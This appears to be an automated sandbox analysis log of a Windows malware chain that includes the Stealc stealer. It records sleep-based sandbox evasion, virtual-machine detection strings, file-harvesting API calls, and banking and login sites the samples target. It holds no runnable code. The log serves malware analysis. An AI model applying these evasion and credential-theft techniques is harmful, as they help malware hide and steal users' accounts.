Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe API coverage: 5.3 %
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8092 Thread sleep count: 1100 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8092 Thread sleep time: -2201100s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8096 Thread sleep count: 1102 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8096 Thread sleep time: -2205102s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084 Thread sleep count: 1055 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084 Thread sleep time: -2111055s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8072 Thread sleep count: 101 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8072 Thread sleep time: -3030000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8088 Thread sleep count: 955 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8088 Thread sleep time: -1910955s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8100 Thread sleep count: 1107 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8100 Thread sleep time: -2215107s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108 Thread sleep count: 1149 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108 Thread sleep time: -2299149s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112 Thread sleep count: 1152 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112 Thread sleep time: -2305152s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104 Thread sleep count: 917 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104 Thread sleep time: -1834917s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3632 Thread sleep time: -900000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe TID: 1748 Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe TID: 2384 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe TID: 7664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7736 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 720 Thread sleep count: 372 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 720 Thread sleep time: -744372s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6976 Thread sleep count: 364 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6976 Thread sleep time: -728364s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 2028 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5724 Thread sleep count: 350 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5724 Thread sleep time: -700350s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 4812 Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5428 Thread sleep count: 370 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5428 Thread sleep time: -740370s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3808 Thread sleep count: 390 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3808 Thread sleep time: -780390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6696 Thread sleep count: 334 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6696 Thread sleep time: -668334s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3836 Thread sleep count: 369 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3836 Thread sleep time: -738369s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3504 Thread sleep count: 371 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3504 Thread sleep time: -742371s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 17_2_0077E430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00784910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_00784910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 17_2_0077BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_007716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_007716D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_0077F6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00783EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 17_2_00783EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 17_2_0077DA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_007838B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 17_2_007838B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00784570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 17_2_00784570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 17_2_0077ED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0077DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_0077DE10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00771160 GetSystemInfo,ExitProcess, 17_2_00771160
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cyBD74hgFSrUAP0/ypMI9rTGQDrKSl81mG0FZJNIeL
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.0000000001314000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2162755046.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2160616233.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3761965009.0000029989458000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461071670.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: svchost.exe, 00000003.00000002.3753120064.0000023C2968A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: svchost.exe, 00000023.00000002.3754396295.0000029987E2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: svchost.exe, 00000003.00000002.3751892147.0000023C2964E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: svchost.exe, 00000004.00000002.3749895131.0000020504AAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:l/!
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
Source: file.exe, 00000006.00000003.1347135703.0000000001052000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,1
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: axplong.exe, axplong.exe, 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3471962829.0000000000C56000.00000040.00000001.01000000.00000018.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000003.00000002.3752518295.0000023C2967D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005857000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696492231p
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 550b7cfe5f.exe, 0000002A.00000002.3473998772.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000004.00000002.3749895131.0000020504AAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
Source: svchost.exe, 00000008.00000002.3766906774.000002205F62B000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000002.3755458328.0000000001910000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2543272887.000001E286618000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000004.00000003.2435762552.0000020505340000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 550b7cfe5f.exe, 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wYcyBD74hgFSrUAP0/ypMI9rTGQDrKSl81mG0FZJNIeL
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 00000003.00000002.3750830465.0000023C29602000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: file.exe, 00000006.00000002.1376876736.0000000000BEA000.00000040.00000001.01000000.00000004.sdmp, axplong.exe, 00000009.00000002.1397229219.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 0000000A.00000002.1425116775.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3471962829.0000000000C56000.00000040.00000001.01000000.00000018.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: svchost.exe, 00000003.00000002.3751595435.0000023C2962B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000003.00000002.3751892147.0000023C2964E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000004.00000002.3749895131.0000020504AAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
Source: svchost.exe, 00000003.00000002.3752518295.0000023C29664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000e1}
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe API call chain: ExitProcess graph end node
